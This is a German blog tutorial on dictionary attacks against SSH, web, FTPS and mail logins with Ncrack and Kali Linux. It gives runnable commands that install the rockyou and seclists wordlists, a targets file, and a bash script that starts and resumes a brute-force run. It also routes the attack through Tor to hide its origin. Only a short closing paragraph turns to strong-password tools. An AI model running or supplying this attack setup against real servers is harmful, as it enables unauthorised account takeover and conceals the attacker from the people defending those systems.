Tuesday, February 23, 2021

Wörterbuchangriff: SSH-, Web- und Mail-Accounts hacken mit Ncrack und Kali Linux

Mit der Wortliste rockyou hat Kali Linux etwas nettes vorgelegt :-) Doch was anfangen mit Passwort- und Benutzernamensammlungen? Accounts hacken!
In diesem Artikel will ich nun erklären, woher die unzähligen SSH-Loginversuche stammen, die tagtäglich im Log des Server auftauchen.

Die Passwort- und Benutzernamensammlungen seclists und wordlists

Die Pakete seclists und wordlists beinhalten mehrere Listen, bestehend aus Benutzernamen und Passwörtern, die mit dem Ziel erstellt wurden, einem Sicherheitstester zu ermöglichen, diese auf einen Test anzuwenden.

Mehr darüber ist auf https://tools.kali.org/password-attacks/ zu lesen.

Installiert werden die Listen mit:

apt install seclists wordlists

Die enthaltenen Listen kann man sich mit dpkg -L seclists wordlists anzeigen lassen.

Ich will mich hier auf /usr/share/seclists/Usernames/Names/names.txt und /usr/share/wordlists/rockyou.txt.gz beschränken.

Accounts hacken

Zum Accounts hacken ist Ncrack von https://nmap.org/ meine Wahl. In der Paketverwaltung im Paket ncrack zu finden.

apt install ncrack

Ziele definieren

Die Angriffsziele übergibt man mit dem Schalter -iL, welcher eine Textdatei erwartet, die zeilenweise die Ziele in der Form <service>://target[:port-number] enthält. Z.B.:

cat <<! >targets.txt
ssh://scanme.nmap.org:22
ftps://scanme.nmap.org:990
https://scanme.nmap.org:443
imaps://scanme.nmap.org:993
smtps://scanme.nmap.org:465
!

Diese Liste hackt SSH-, Web- und Mail-Accounts! Eine Liste von weiteren Services findet man unter /etc/services. Ncrack muss aber nicht alle davon unterstützen.

Mit den Schaltern -U und -P werden die Benutzernamen und Passwörter angegeben. Wieder als Textdateien, die zeilenweise Benutzernamen bzw. Passwörter enthalten.

Die Wordliste rockyou muss also noch entpackt werden:

gunzip --keep /usr/share/wordlists/rockyou.txt.gz

Hack starten

Dieses Skript startet den Hack mit ncrack(1):

#!/usr/bin/env bash
# start ncrack scan
# Code-Listing zu den Schaltern von weiter oben
set -x -e
ncrack  
    -iL targets.txt  
    -U /usr/share/seclists/Usernames/Names/names.txt  
    -P /usr/share/wordlists/rockyou.txt  
    --save session.dat  
    -oA ncrackscan.`date +%F` --append-output
    "$@"

Der Schalter --save speichert die Session, um später, z.B. nach einem beenden des Terminal oder poweroff(8) fortzusetzen.

Hack fortsetzen

Mit dem Schalter --resume kann ein mit --save gespeicherter Hack fortgesetzt werden. Es dürfen hier keine weiteren bzw. neue Parameter angegebenen werden:

#!/usr/bin/env bash
# resume ncrack scan
set -x -e
ncrack --resume session.dat

Über tor(1) hacken

Mit dem Schalter --proxy kann man, das Netzwerk zur Anonymisierung von Verbindungsdaten, Tor als SOCKS-Proxy nutzen:

apt install tor
ncrack <options…> --proxy socks4://localhost:9050

Debuggen

Zum Debuggen des Hack kennt ncrack(1) die Schalter -v (für Verbose; der mehrfach angegeben werden kann, was die Informationsmenge erhöt) und -d1 bis -d10 (für Debug; wobei 1 bis 10 die Ausführlichkeit des Log bestimmt).

Sichere Passwörter

Zum Schluss will ich noch die Kommandos pwgen -s und apg -s erwähnen. Zwei Tools, um relativ sicher Passwörter zu erstellen, die höchswahrscheinlich nicht in Passwortlisten zu finden sind. Die Tools befinden sich in den gleichnamigen Paketen.

Add comment

Fill out the form below to add your own comments